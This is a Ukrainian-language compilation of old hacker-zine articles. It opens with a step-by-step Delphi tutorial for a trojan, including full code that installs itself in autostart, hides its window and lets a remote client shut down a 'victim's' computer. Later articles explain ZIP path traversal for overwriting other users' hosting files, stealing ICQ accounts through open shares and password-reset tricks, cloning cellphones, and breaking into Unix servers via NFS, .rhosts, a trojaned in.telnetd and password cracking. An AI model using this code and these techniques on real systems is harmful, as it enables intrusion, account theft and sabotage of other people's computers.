Бойовий кінь за 10 хвилин:
Привіт! Зараз я розповім тобі про те, як можна на Delphi можна розробити невеликого троянського коня.
Приготуйся, нам належить написати відразу дві проги. Одна буде перебувати на твоїй машині (клієнт), іншу треба буде підкинути жертві (сервер). Роботи буде багато, тому менше слів, і ближче до тіла.
Троянський сервер:
Отже, запускай Delphi або якщо він у тебе вже запущений, то створюй новий проект («File» «New Application»). Зараз ми приймемось за серверну частину трояна.
Для початку вибери пункт меню «Options» з меню «Project».

Тут ти повинен перенести «From1» з розділу «Auto-Create forms» (список ліворуч) «Available forms» (список праворуч), як це зроблено у мене. Тільки що ми відключили From1 зі списку авто инициализируемых форм. Тепер ініціалізацію доведеться зробити вручну. Не лякайся, це дуже просто.
На сторінці «Application» цього діалогу є кнопка «Load Icon». Натисни її, щоб змінити іконку майбутньої проги. Якщо ікону не змінити, то буде використовуватися дельфячая, а вона швидко видасть твоє смертельне зброю.
Тепер ти повинен кинути на форму компонент ServerSocket з розділу «Internet», це сервак протоколу (за замовчуванням TCP, і нам його достатньо). Виділи створений ServerSocket1 і перейди в ObjectInspector. Тут тебе цікавить тільки властивість «Port». За замовчуванням воно дорівнює 1024, але я тобі раджу його поміняти на будь-яке інше (бажано більше 1000).
Тепер клацни в будь-якому місці на формі, щоб активізувати її властивості. Перейди в ObjectInspector і клацни по закладці Events. Двічі клацни по рядку «OnCreate» і Delphi, як завжди, створить процедуру, вона буде виконуватися при ініціалізації форми. Напиши там наступне:
procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create(‘Software’);
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey(‘Software’, true);
RegIni.OpenKey(‘Microsoft’, true);
RegIni.OpenKey(‘Windows’, true);
RegIni.OpenKey(‘CurrentVersion’, true);
RegIni.WriteString(‘RunServices’, ‘Internat32.exe’,
Application.ExeName);
RegIni.Free;
ServerSocket1.Active:=true;
end;
Тепер перейти в початок тексту і напиши після «uses» слово «registry». Ми вже робили таку операцію в статті про мега плеєр, але я повторю, як це буде виглядати:
uses registry, Windows, Messages,
Тепер я поясню, що ми написали в процедурі.
«var RegIni:TRegIniFile» — тут ми оголосили змінну RegIni типу TRegIniFile. За допомогою цієї змінної ми будемо спілкуватися з реєстром.
«RegIni:=TRegIniFile.Create(‘Software’)» — ініціалізуємо змінну вказує на реєстр.
«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говоримо, що нас цікавить реєстру HKEY_CURRENT_USER.
«RegIni.OpenKey(‘Software’, true)» — відкриваю підрозділ «Software».
Далі я послідовно відкриваю підрозділи, пробираючись в надра віконець.
«RegIni.WriteString(‘RunServices’, ‘Internat32.exe’, Application.ExeName) записую в розділ «RunServices» (у цьому розділі зберігаються проги, які автоматично завантажуються при старті), новий параметр з ім’ям «Internat32.exe» ім’я майбутнього файлу) і значенням Application.ExeName (тут зберігатися повний шлях до запущеного трояну).
«RegIni.Free» — знищую більше непотрібний об’єкт RegIni.
Все це робилося, щоб при запуску проги, вона сама себе прописувала в розділі автозапуску. І після перезавантаження комп’ютера вона автоматично завантажувалась в пам’ять.
Остання рядок «ServerSocket1.Active:=true» запускає сервер на зазначеному тобою порте. З завантаженням покінчено. Тепер давай займемося вивантаженням. Знову виділи форму і в закладці Events у ObjectInspector-а двічі клацни по рядку «OnDistroy». Тепер створиться процедура, яка буде виконуватися при знищенні форми. У створеній процедурі напиши:
procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
ServerSocket1.Active:=false;
end;
Цим я відключаю сервак. Якщо цього не зробити, то при першій же перезавантаження твоя жертва може зловити синій екран, якщо ти в цей час будеш підключений до сервера. З одного боку, це добре. Твоя жертва в черговий раз переконується в поганій захищеності його віконець. А з іншого боку, я не думаю, що слід видавати себе завчасно. Тим більше, що після синього екрану перезавантаження може зупинитися, а нам це не треба (забіжу вперед і скажу, що ми самі будемо перевантажувати комп’ютер жертви).
Тепер потрібно виділити ServerSocket1 і перейти на закладку Events у ObjectInspector-а. Двічі клацни по рядку «OnClientRead» та у створеній процедурою (вона буде викликатися, коли що-небудь приходить на порт) напиши:
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
if Socket.ReceiveText =’R’ then
ExitWindowsEx(EWX_SHUTDOWN,0);
end;
Тепер, як це звучить по-нашому:
Якщо отриманий текст = буквою R, то
Відправити комп’ютер в редаун.
ExitWindowsEx редаун змусить вікна згорнутися і відключити комп’ютер від харчування. Я взагалі добрий дядько, тому використовував параметр EWX_SHUTDOWN. З цим параметром, перед редауном всіх запущених додатків полетить запит про вимкнення, і жертва зможе зберегти свої змінені дані. Якщо ти злей мене, то використовуй EWX_FORCE. У цьому випадку, комп’ютер впаде без попередження та зі швидкістю світла, так що жертва не встигне від страху повітря зіпсує :).
Троян практично готовий, збережи його. Для цього вибери «Save All» з меню «File». З початку Delphi запросить ім’я форми. Залиши за замовчуванням (Unit1) і натиснути «Зберегти». Потім буде запит на ім’я проекту, яке буде використовуватися в якості імені ЕХЕ файл. Назви його «Internat32», щоб файл не викликав особливих підозр.
Стайня для коня:
Тепер ти повинен гарненько заховати свого майбутнього скакуна, щоб його не було видно в панелі завдань. Для цього виберіть пункт меню «Project Manager» з меню «View».

Клацни правою кнопкою по Internat32.exe і в меню виберіть «View Source». Перед тобою відкриється маленький файл з вихідним текстом проекту. Порівняй те, що ти побачиш з цим текстом, і допиши те, чого не вистачає, а що зайве прибери (так не так вже й багато):
program Internat32;
uses
Forms,
Windows.
Unit1 in ‘Unit1.pas’ {Form1};
{$R *.RES}
var
WhEvent:THandle;
begin
Application.Initialize;
ShowWindow(Application.Handle,SW_Hide);
Form1:=TForm1.Create(nil);
Application.Run;
WhEvent:=CreateEvent(nil, true,false, ‘et’);
while (true) do
begin
WaitForSingleObject(WhEvent,1000);
Application.ProcessMessages;
end;
end.
Будь уважний при переписуванні. Все має бути один до одного. Тепер я розповім, що тут написано:
На самому початку немає нічого цікавого, і нас абсолютно не стосується. Нас цікавить все, що написано після слова «Var».
WhEvent:THandle Цим я кажу, що мені потрібен покажчик WhEvent на порожнє подія Thandle.
Application.Initialize Ініціалізується троян.
ShowWindow(Application.Handle, SW_Hide) Встановлюю параметри вікна. Параметр SW_Hide каже, що вікно повинно бути невидимо. Єдине, як можна після цього побачити, так це натиснути Ctrl+Alt+Del. Але тут у нас використовується не викликає підозри (тільки у чайника, профі вже давно знають, про таке імені) ім’я.
Form1:=TForm1.Create(nil) створюю форму. Мені доводиться це робити так, тому що ми прибрали форму зі списку авто створюються.
Application.Run запускаю трояна. Тут запускаються обробники подій і інша нісенітниця, за яку відповідає Delphi і яку довелося б писати вручну на С або С++. А тут все дуже просто. WhEvent:=CreateEvent(nil, true,false, ‘et’) ініціалізація порожнього події.
Наступні п’ять рядків я напишу словами, а ти розберешся як завжди методом порівняння:
Поки (true) виконувати
Розпочати цикл
Чекати поки настане подія (пустий подія, 1000 мілісекунд)
Отримати управління
Закінчити цикл
Дві строчки між початком і кінцем циклу буде виконуватися нескінченно, тому що true воно завжди true, і з цього циклу виходу немає. Весь цикл заключається в двох особливостях:
1. Запускається очікування неіснуючого події. Так як подія не існує, то програма прождет його рівно зазначений час в якості другого параметра (1000 мілісекунд або 1 секунда).
2. Отримати управління.
Після другого кроку програма знову перейде на пункт 1 і запустить очікування. Під час очікування користувач працює з іншими програмами як завжди. Коли трояну (кожну 1 секунду) передається управління, то наш кінь перевіряє: чи є для нього повідомлення. У нашому випадку повідомлення може бути одне прихід на вказаний тобою порт керуючої команди. Якщо повідомлення є, то троян їх виконує. І в будь-якому випадку (є повідомлення чи ні), після цього користувач знову працює 1 секунду без проблем. Перевірка відбувається так швидко, що жертва не відчує навантаження трояна навіть на четвірці з сотим каменем.
Натисни Ctrl+F9» щоб Delphi створив.ехе файл без запуску проги. Як тільки Delphi перемозгует весь код, можеш вважати, що серверна частина готова. Якщо захочеш її тестувати, то не забудь, що після першого ж запуску троян пропишеться в реєстрі за адресою:
HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunservices.
Не забудь після тестування його видалити.
Тепер переходимо до клієнтської частини, яку ти повинен будеш запустити на своєму комп’ютері для управління комп’ютером жертви.
Троянський вершник:
Знову збережи всі зміни і створи новий проект. Настав час писати клієнтську частину трояна. Ще пару хвилин напруженої праці і всі наші красуні :). На новий проект ти повинен кинути три компонента:
1. Button закладки «Standart» для відправки команди на комп’ютер жертви.
2. Edit із закладки «Standart» для вводу імені або адреси жертви.
3. ClientSocket з закладки «Internet» клієнт порти для зв’язку з сервером
Подивись на малюнок 3, у тебе повинно вийти щось схоже.

Виділи ClientSocket1 і в ObjectInspector-е зміни властивість порт. За замовчуванням він 0, а ти повинен поставити той, який ти призначив сервера.
Тепер двічі клацніть по кнопці і у створеній процедурою (процесор натискання кнопки) напиши наступне.
procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:=Edit1.Text;
ClientSocket1.Active:=true;
ClientSocket1.Socket.SendText(‘R’);
ClientSocket1.Active:=false;
end;
ClientSocket1.Host:=Edit1.Text В ClientSocket1 заносимо ім’я жертви твоєї локалці. Якщо збираєшся використовувати троян в інеті, то там ти ім’я ніяк не зможеш дізнатися. Тобі доведеться використовувати IP-адресу, а значить ця строчка замінитися на ClientSocket1.Addres:=Edit1.Text. І вводити в Edit1 ти повинен будеш IP адресу.
ClientSocket1.Active:=true активувати з’єднання з сервером.
ClientSocket1.Socket.SendText(‘R’) відправити літеру R. Пам’ятаєш, що у нас було пару хвилин тому. Якщо сервер отримає літеру R, то він перевантажить машину.
ClientSocket1.Active:=false закрити з’єднання з сервером.
Всі. Троян готовий до бою. Натисни Ctrl+F9» щоб Delphi створив ЕХЕ файл без запуску проги. Знайди жертву і протестуй свого вірного коня. Для цього потрібно запустити серверну частину на комп’ютері жертви. Потім запустити клієнтську частину на своєму комп’ютері. Ввести в клієнт ім’я комп’ютера жертви (або адресу, якщо ти скомпілював під використання через IP) і натиснути кнопку. Комп’ютер жертви повинен перевантажиться.
На цьому я закругляюсь. Удачі тобі.

Furer[OST].

Дефейс у прова з допомогою ZIP-
Ну. Дарова. Я ні як Furer – димагог, а просто людина мало говорить.
Ця стаття посвещается, тим хто хоче замутити свій хостинг з можливістю на нього розпакування ZIP-архівів або тим хто хоче поїхати хостинг з такою можливістю 😉
У цій статті ви зможете дізнатися про одній дірці з допомогою якої можна закачувати файли і папки в чужі акаунти з свого =)) Якщо зацікавилися, то читайте далі.
INtRo Все почалося з ідеї створити чат, доступний з гостьового входу. В якості провайдера був обраний Центральний Телеграф, так як коннект з ним завжди з першого разу і дуже рульный. Даний пров дає 1 мег під пагу, якщо купити інет карту, що ми і зробили. Далі виявилося, що CGI/ASP/PHP єтс. заборонені, можна юзати тільки готові скрипти (які, природно, якістю не блищать).
Скрипт чату серед них, звичайно, не було, і ми вирішили заюзать під ці цілі скрипт гостьової книги або форумів. Через деякий час чат був готовий, але, після пари тижнів, було вирішено, що чат зроблений лажово — для входу потрібно зареєструватися у нас, без цього — тільки під ім’ям Guest тощо заморочки.
Загалом, було необхідно переробляти. У ЦТ класти файли на пагу можна тільки якщо в тебе щось є на рахунку, а у нас (так достеменно і невідомо чому) зняли останні 15 хвилин, які лежали там спеціально для доступу до паге ;).
Вирішили не класти гроші на цей рахунок, а зробити все по-новому, з чистого аркуша, так сказати. І зробили, все круто і зручно, тільки ось постала одна проблемка — як би закинути на старий сайт index.html з посиланням на новий? Доступ до старого заборонений!
(NivaX: Відразу обмовлюся — в старому чаті накопичилося деяку кількість заслужених чатлан — класні, перевірені друзі, і дуже захотілося побачити їх на новому сайті) А раз проблемка встала — варто пошукати рішення.
І ми стали шукати, як би можна отримати доступ на запис у файли інших паг. Все, довге і нудне інтро закінчилося. 😉
MAiN Тепер, власне, про знайдений ба. На пагі ЦТ доступ тільки через веб-інтерфейс :(, а щоб не звихнутися, хитаючи хмару файлу, придумана там хороша система: пакуєш файло в зіп, кидаєш зіп через веб-інтерфейс, а там є така кнопка — розпакувати. Ось і прийшла ідея, що розпакувальник у них напевно, якийсь кривий-доморослий. Так і виявилося. При перевірці на вошивість було виявлено наступне:
Якщо распаковываемые файли вже існують, то вони перезаписуються без запиту;
Архивер всі розпаковує з шляхами;
Мало того, що з шляхами, так шляху ще і не перевіряються на наявність точок і слешів!!!
Таким чином, з’явилося два способи досягнення мети. Перший, ясний перець, ґрунтувався на підробці шляхів — створювався каталог з ім’ям із двох символів, в ньому — каталог з ім’ям пагі, на яку передбачалося залити «оновлення» :)),
а в цю папку вже клався сам файл для заливки. Перший каталог паковался в зіп, зіп відкривався з HIEW або чого-нитку ще два горезвісні символу в назві папки замінювалися на дві точки у всіх місцях, де були знайдені в зипе. Другий спосіб майже такий же — створювався файл з довгим ім’ям, початок якого потім замінили на точки і слеші. Наприклад, щоб залити index.html на пагу по імені vaspupkin, створюємо файл: !!_vaspupkin_index.html з необхідним змістом, пакуємо в зіп, потім в HEX-Редакторі міняємо “!!” на “..”, а “_”””.
Кидаємо, розпаковуємо, отримуємо результат :)). Природно, можна було писати у будь-який файл, на який є право доступу на запис, але наша мета була інша.
Після зміни індексу на старій паге ми заспокоїлися і відкатали лист адмінам, щоб пофиксили. Ось, начебто, і все про б 😉 OuTTRo
Загалом-то, зародок цієї ідеї прийшов зі світу BBS і FIDO, де ми бавилися підробкою шляхів *.zip-пакетах, распаковывавшихся автоматично. О, це було солодко! :))
Адже BBS і поінти часто під DOS/Windows, а там можна було поправити ім’я файлу на com1/com2 (модем завалений мегами даних :), prn (принтер, якщо включений, звичайно :), ну і звичайно ж улюблений con (висновок прямо в консоль), а код 07h при виводі на консоль — мерзенний спикерный звучок ;)).
Потім ідея підставити вызод на рівень вище в зіп, прийшла спочатку до NivaX’у, була виправлена і доопрацьована, і ось на виході результат. Ну що, допив пиво?
ЗИ: На ЦТ цей баг пофиксили після нашого листа, а от якщо знайдеш інших провов з розпакуванням архіву — прапор тобі в руки ;).
І пам’ятай: архів — неозоре поле діяльності!
Шлях усунення цієї діри: встановлювати більш свіжу версію ZIP архіватора.
З повагою: Furer[OST] aka ][ and Smasher[OST] aka Сірий.

Дістаємо собі гарний ICQ Uin.
Дарова!!!
У цій статті я тобі розкажу як дістати собі хорошоий Uin.
Ну є багато різних способів це зробити… Але для початку подумай і прикинь, воно тобі треба?.. Будь чол, який користується ICQ запалится на твій гарненький номерок, типу 777666. І почнеться, м’яко кажучи атака(якщо її можна так назвати). А якщо на тебе западе какой-нить крутий хакер, то Став собі гарненький файрвол і оновлюй антивірусну базу.
А якщо хочеш, я дам тобі раду. Зроби навпаки, створи таку прогу, або че нитка в такому дусі, щоб захистити комп(не важливо, твій-чужий) від угону гарненького номерка.
А краще спочатку угони гарненький номерок, а потім думай про захист 😎
Спосіб 1
Дістаємо якийсь сканер на кулі (не ті котрі діти носять з собою) точніше на расшаринные ресурси. Ну я віддаю перевагу Xsharez. Під смаки, звичайно, не сперечаються але в цій статті ми будемо його використовувати. Відкриваємо наш сканер-бачимо лого. Загурзилось…
Тепер зліва вгорі вводимо початковий ІП адреса (це адреса з якої почнемо скані) і кінцевий ІП(ну само собою це кінець. Тобто якщо ви хочете просканить 195.78.225.1 (ну приперло вас написати цей дарес) то пишемс його в перший рядок і щоб на кінці було 1 інакше ви будете скані тільки один ІП! Натискаємо кнопку Скан і і чекаємо! Якщо з’являються ІП адресу, швидко натискаємо на цей ІП і тиснемо кнопку захоплення диска. Біжимо в наш всіма улюблений фар та заходимо на наш новий (хе хе) диск! Не марнуй час! відразу біжи в Програм файлс і шукай папку ICQ/version дивись в будь-яких версиах! Копіюй (uin#).dat наприклад 113183.dat і другий забіг робимо в папку Windows 🙂
. Забираємо все *.pwl файли! расшифровчиков купа… Самі знайдете.
Та й до речі раджу придбати ICQr щоб розшифрувати дат файли… Чим мені не подобається цей сканер, тим що після нього у мене весь комп гальмує :(. 2 спосіб
Ну це звичайно тупий спосіб і хороший номер собі ви не достаните Скажіть своєму дургу умерикасосу що в ICQ був нещодавно знайдений прикольний баг! І якщо він поставить в інфе [email protected] (ваше мило теж можна) то в інфе буде написано не те мило а [email protected] (або придумайте)Головне переконати людину поставити в інфу своє мило! А самі ми вже давно сидите на www.icq.com/password і вже давно вписали його номер і мило яке він буде ставити…
І як тільки він натиснув на кнопку SAVE тисніть на кнопку Сенд! хе хе! Тут щось є з соц. інженерії :).
3 спосіб
Найбільш діючий спосіб… Відкриваємо вікно пошуку в асі і починаємо шукати номери які захочете тільки раджу починати з 8значных. І чого ж ми шукаємо запитаєте ви?? Ми шукаємо дурня який поставив собі вигадане мило. Раджу шукати тих у кого hotmail акаунти тк хотмайл дуже популярний що деякі тільки його і знають і пишуть заради приколу [email protected] інфе. Ну як??? тепер я думаю вже до будь-якого дійде… Йдемо на hotmail.com натискаємо на Sign Up вгорі далі вводимо ліву інфу! В полі логін ми пишемо логін який вказаний в інфе приколиста: jack якщо далі йде сраница з Terms of use то знай-уйн твій! Швиденько біжимо на www.icq.com/password вводимо наш новий уйн і мило. Повертаємося до хотмылу. Натискаємо I accept далі вони нам по доброму пропонують спам 🙂 ми звичайно ж нічого не вибераем і сміливо нажимем внизу кнопку Next. І що ж ми бачимо?
Що в ящику тільки один лист! І це лист з поздоровленням що зарегалсиь на хотмыле. Не бійтеся! просто не прийшов пас ще… можна збігати за пивом на кухню або вперто натискати на Inbox щоб воно з’явилося. Ну ось… Прийшов наш довгоочікуваний пароль Я думаю не треба пояснювати як поставити другого юзверя на асі ;-)!
Хочу сказати на останок я натырил дуже багато асьок за допомогою 3 способи! І самий прикол був коли я дістав собі значний 6 уйн!!! Мило звичайно було не на хотмыле, але на якомусь там hotbox.com! От і все.
Є ще туєва купа різних способів, але тут я навів найпоширеніші. І запам’ятай:
КРУТІ НОМЕРКИ, ТІЛЬКИ У КРУТИХ.
З повагою: Furer aka ][.

FAQ по злому стільникових
Питання №1.
Які телефони ламаються?
Відповідь: будь-які, якщо за ним проїхати на ковзанці або скинути з десятого поверху.
Питання №2.
Не я серйозно. Я хотів би дізнатися, які стільникові системи мають двійників і які мобільні телефони можна пристосувати для створення двійника?
Відповідь: Ну якщо серйозно В Росії двійників мають наступні стільникові і транкові системи: AMPS/DAMPS (без захисту A-Key)«Фора» (Петербург) NMT-450 (без SIS-коду)Ще живий у Мінську MPT-1327 (транк)AMT, ACBT SmarTrunk (транк)*.* Не мають двійників компанії Білайн (протокол DAMPS IS-54) і МСС (протокол NMT 450і), так як застосовуються системи аутентифікації: A-Key і SIS-code відповідно. (у системі компанії Білайн двійники можливі тільки на незахищених роумінгових номерах). Для створення двійника можна пристосувати будь-який телефон, який може працювати в системі, де працює телефон власника. Для цього потрібно всього лише розібратися в керуючій програмі хост процесора телефону.
Питання №3.
Тоді наступне запитання: Які процесори використовуються в стільникових телефонах?
Відповідь: Так власне різні. Це залежить від моделі телефону і фірми-виробника. Ось приблизний список: ФирмаИспользуемые процесори Motorola Хост: 68HC11DSP: AT&T16XX, MC566XX Ericsson Хост: ARM7TDMI coreDSP: Texas Instruments Nokia Хост: H8/XXXZ80 Список звичайно не повний. Про конкретної моделі телефону і використовуваному в ньому процесорі можна дізнатися на сайті виробника телефонів.
Питання №4.
Так тамже все не по нашому! Як я зрозумію що до чого?
Відповідь: А як інші розуміють? Багато хто взагалі з іноземної вище пари не мали. Береш словник і перекладаєш по-тихеньку. Є інший варіант — запускаєш програму перекладача і перекладаєш. А взагалі-то це з області лінгвістики, а не фрикинга, тому прошу надалі питань такого роду не задавати.
Питання №5.
Я знайшов на вулиці відключений телефон. Як би зробити так, щоб по ньому безкоштовно можна було дзвонити?
Відповідь: Це зробити дуже непросто. Все залежить від моделі телефону, протоколу його роботи, виду використовуваного у вашій місцевості стільникового зв’язку, та інших параметрів. У цьому випадку краще звернутися до фахівців.
Питання №6.
А я хочу сам спробувати. Де краще прочитати про модифікацію стільникових телефонів?
Відповідь: Ось це по нашому. radiophone.dhp.com
Питання №7.
Які системи захисту від двійників існують в стільникових мережах?
Відповідь: В мережі DAMPS для захисту може застосовуватися протокол аутентифікації A-Key, в мережі NMT — система SIS (Subscriber Identity Security). Питання №8.
Що таке AKEY і як він працює?
Відповідь: AKEY це тривіальне назва системи автентифікації, що використовується в мережах AMPS/DAMPS. Власне AKEY представляє з себе восьмибайтовое число-ключ, який зберігається в стільниковому телефоні абонента і є унікальним для кожного абонента. AKEY вводиться при продажі телефону клієнта і зберігається в базі. AKEY не змінюється і залишається постійним при нормальній роботі телефону. На основі AKEY (постійний ключ) з допомогою хеш-функції CAVE, що використовує в якості вхідних параметрів, крім AKEY, ESN, MIN телефону, а також випадкове число, надіслане ефіру з базової станції, генерується тимчасовий ключ, званий SSD_A (теж 8 байт). Цей ключ в подальшому використовується при аутентифікації для генерації відповідного значення. Постійний AKEY не використовується при аутентифікації і служить тільки для розрахунку часового ключа. При встановленні з’єднання система передає стільниковому телефон випадкове число, яке шифрується за алгоритмом CAVE (Cellular Authentication and Voice Encryption) з використанням тимчасового ключа SSD_A та інших унікальних параметрів телефону (ESN,MIN) в якості ключа. Відповідь надсилається на базову станцію, яка, у свою чергу, незалежно від телефону генерує відповідне число (всі параметри телефону, в тому числі і AKEY, і поточний SSD_A, зберігаються в базі на станції), і порівнює його з отриманим. В випадку неспівпадіння числа, прийнятого від телефону з незалежно посчитанным числом, аутентифікація вважається невдалою і телефону відмовляється у з’єднанні. Періодично (приблизно раз на тиждень) станція посилає стільниковому телефону повідомлення про генерації нового тимчасового ключа, SSD_A, після отримання цього повідомлення (SSD_UPDATE) телефон розраховує новий тимчасовий ключ SSD_A, використовуючи вже відомий постійний AKEY, ESN, MIN, і випадкове число зі станції. Таким чином, сам ключ аутентифікації (SSD_A) є тимчасовим і періодично міняється, і стає безглуздим «клонування» трубок (а також знаходження SSD_A методом послідовного перебору), оскільки після першого ж зміни ключа працювати далі буде тільки один телефон з новим ключем.
Питання №9.
Не можна розшифрувати АКод по посилкам зі станції і відповідей трубки?
Відповідь: Це можна зробити тільки методом прямого перебору кодів, та й то з обмеженнями. Функція CAVE є односторонный хеш-функцією з малою розрядністю вихідного коду, тому обчислити ключ з даними, що передаються по ефіру практично неможливо.
Питання №10.
Що таке SIS і як він працює?
Відповідь: SIS (Subscriber Identity Security) — система аутентифікації та захисту інформації користувачів мережі NMT-450i. Принцип дії SIS аналогічний AKEY: при запиті з’єднання станція посилає стільниковому телефону випадкове число, яке обробляється хеш-функцією SIS в телефоні з використанням 120-бітового унікального ключа користувача, частина результату хеш-функції послылается на базову станцію для порівняння, інша частина використовується для шифрування набраного номера. На відміну від AKEY, SIS не змінюється і завжди залишається постійним для конкретного телефону, а також забезпечує шифрування набраного номера (у системі AKEY теж передбачена можливість шифрування номери, проте вона не використовується в Російських системах). Також, на відміну від AKEY, SIS-код зашивається в телефон виробником і не може бути змінений провайдером послуг (AKEY зазвичай може вводиться з клавіатури). Питання №11.
Які системи стільникового зв’язку захищені від прослуховування?
Відповідь: Ніякі. Аналогові системи (NMT, AMPS, DAMPS в аналоговому режимі) без праці прослуховуються звичайним приймачем-сканером, який має можливість налаштування на діапазон стільникової системи. Цифрові системи (DAMPS/TDMA, GSM) прослуховуються спеціально модифікованими телефонними апаратами тієї ж системи.
Питання задавав Furer, а відповідав Mr.Tyson.
З повагою: Mr.Tyson[OST] aka великий Шурко
and Furer[OST] aka ][.

C чого ж все таки починати злом сервера (сайту, сторінки і т. д.)

Ти читаєш журнал хакер? Немає??!!! Мило і мотузка в будь-якому господарському магазині Москви. Я знаю, багато кричать що типу журнал для ламерів, але сидячи в Ірці я задав одне питання такого «крутого» чолу, що таке роутер і чому він перешкоджає снифингу? Місця відповіді був комплімент в мою честь, типу: «Сам знаєш?». Тому не слухай нікого, роби свою справу, читай ксакеп, затарься колою, сигаретами і вникай…
Отже, приступимо! Перше з чого варто почати це просканувати хост на стандартні сценарії CGi за допомогою спеціальних сканерів яких слава богу зараз предостатньо. Ну і що б ви не загубилися у виборі можу порадити кращий (ІМХО) на сьогоднішній день-це [email protected] Cgi Scanner наданий нам хак-групою [email protected], його можна завантажити з йх офіційного сайту www.cc.f2s.com ще правда є сканер від груааы Void (www.void.ru) Але він трохи поступається DCS по швидкості сканування. Ок, далі, сканер знайшов уразливий скрипт і ви запитаєте, що ж робити далі???, а далі вам треба знайти те, як використовувати цей експлоїт, я дам вам кілька посилань, де можна знайти опис цих помилок:
qwerty.nanko.ru (найбільш повне але Англійською) www.void.ru
www.hack-crack.com
або ви можете просто зайти на один з таких сайтів і просто ввести уразливий скрипт в рядку пошуку:
www.packetstorm.securify.com
www.securityfocus.com
www.rootshell.com
Друге і мабуть головне — це сканування портів, для сканування можна використовувати будь-сканер портів(який — на ваш вибір їх зараз скрізь повно), але знову ж таки хотів би звернути вашу увагу на сканер Nscan який можна завантажити тут www.nscan.hypermart.net цей сканер має просто приголомшливою швидкістю сканування і досить просто в управлінні(правда на сайті лежить Shareware версія, яка буде працювати тільки 30 днів)
Після того як сканер знайшов відкриті порти вам треба пріконнектіться до кожного і подивитися яка версія програмного забезпечення встановлена на ньому, робиться це з допомогою клієнта TELNET який є навіть у Вынь95 (98,2000), в командному рядку TELNET ви пишете:
telnet>open www.target.com
і дивіться версію софта наприклад: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP і тд. Після того як ви подивилися версію ви повинні знайти експлоїт під цю версію, йдете знову ж таки на:
www.securityfocus.com
www.packetstorm.securify.com
www.technotronic.com
і вводите в рядок пошуку назву програми та її версію. Після того як ви завантажили експлоїт його як правило треба скомпілювати — тобто привести до робочого стану (як правило) так як більшість серверів в мережі висить на *NIX тобто ЮНІКС ЛІНУКС ИРИКс і тд, то і компілювати його треба під цими системами. Якщо у вас немає встановленого ЮНИКСА, то вам в будь-якому разі (якщо хочете чого не будь ламати потрібен Юнікс Шелл, тобто оболонка Юнікс). Безкоштовно її можна отримати на www.nether.net і тому подібних серверах (введіть на будь-якому пошуковику UNIX+SHELL+FREE) Коли шелл отримано і експлоїт скачав то можна приступати до компилированию, зазвичай експлоїт (в більшості випадків) це програма на мові С для компіляції будемо використовувати компілятор GCC, отже в командному рядку оболонки пишемо:
gcc -o exploit exploit.c і нижимаем Enter.
Хочу так само відзначити, що програми в Юнікс подібний системах запускаються з “./”+ім’я програми, в нашому випадку експлоїт буде запускатися:
>./exploit Третє, ще один досить популярний злом системи це перевірка на расшаренные папки, в Юнікс то можна перевірити за допомогою утиліти showmount, отже з оболонки запускаємо showmount:
>showmount -e www.target.com
і бачимо
/user/ Everyone
або щось інше, але якщо є Everyone то значить папка відкрита на монтування для всіх пишемо далі
>mount -t nfs target.remote.com:/user /mnt
потім переходми в каталог cd /mnt/home і встановлюємо .rhosts
>echo www.target.com user/.rhosts
далі робимо наступне:
>cat /etc/passwd
user::257:20::/: -дивимося користувача і створюємо такого у нас(якщо можливо)
> su — user
! Стаємо їм
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! І заходимо на віддалену машину
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Каталог доступний на запис
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
! Знайшли програму, що запускається
! під root«ом з нашого каталогу
% cd /usr/etc
% mv in.telnetd in.telnetd1
! створюємо троянського коня
% cat in.telnetd
>!/bin/sh
exec /bin/csh -i
% chmod 755 in.telnetd
! і запускаємо його
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
> chown user /etc;
! Робимо /etc своїм
: command not found
> exit;
: command not found
Connection closed by foreign host.
> cd /etc
Після того як у нас є файл з паролями ви берете розшифровувача паролів Юнікс — John The Ripper запускаєте його і чекаєте поки расшифруются паролі потім з шелла коннект на 23 порт і вводите логін з паролем, і всі ви у системі!
І останнє на що я б хотів звернути увагу у цій статті це перевірка NIS сервера. З облочки запускаємо
>rpcinfo -p www.target.com | grep bind і якщо бачимо щось типу 120000 2 udp 2493 ypbind То пробуємо сдлать наступне:
>ypx -o target.пароль-g target.remote.com
Беремо файл з паролями і запускаємо підбирач. На цьому все!
Smasher[OST]/

ПАРАНОЯ.
Ой – її параноя Ой вибачте!!!
Дарова перецы! Як життя, ще не посадили Вас за всі Ваші дії?
Ні?! Ну тоді чекайте.
Поки Ви думаєте, що хакнув сервак і почистивши гарненько логи можна по тра%%%ся з дівчиною, покурити, попити коли, то Ви сильно помиляєтеся. Чому? Та тому, вникай
Навіть коли Ви не заповнюєте спеціальних форм та анкет з незліченними питаннями (про що Вас регулярно просять на тому чи іншому сервері перш ніж дати щось цікаве, для чого ви, власне, там і виявилися),
Навіть якщо Ви не пишете в цих анкетах ні слова правди про себе,
Навіть якщо Ви гордо йдіть з таких сторінок не відповівши ні на одне питання, і вмієте отримувати потрібне там, де не питають зайвого, Навіть коли Ви просто „ходити“ по посиланнях зі сторінки на сторінку, посилаєте лист адресату або в конференцію, читаєте новини, „тягнете“ нову програму або що б то не було ще, слухаєте музику, дивіться відео, спілкуєтеся з Вам подібними допомогою простого тексту, голосом „voice — over — IP“ або з підтримкою „живого відео“, чи використовуєте будь-яким іншим старовинним або новомодним сервісом всесвітньої мережі Інтернет, пам’ятайте:
ВОНИ вже МОЖУТЬ ЗНАТИ про Вас набагато БІЛЬШЕ, ніж Ви припускаєте.
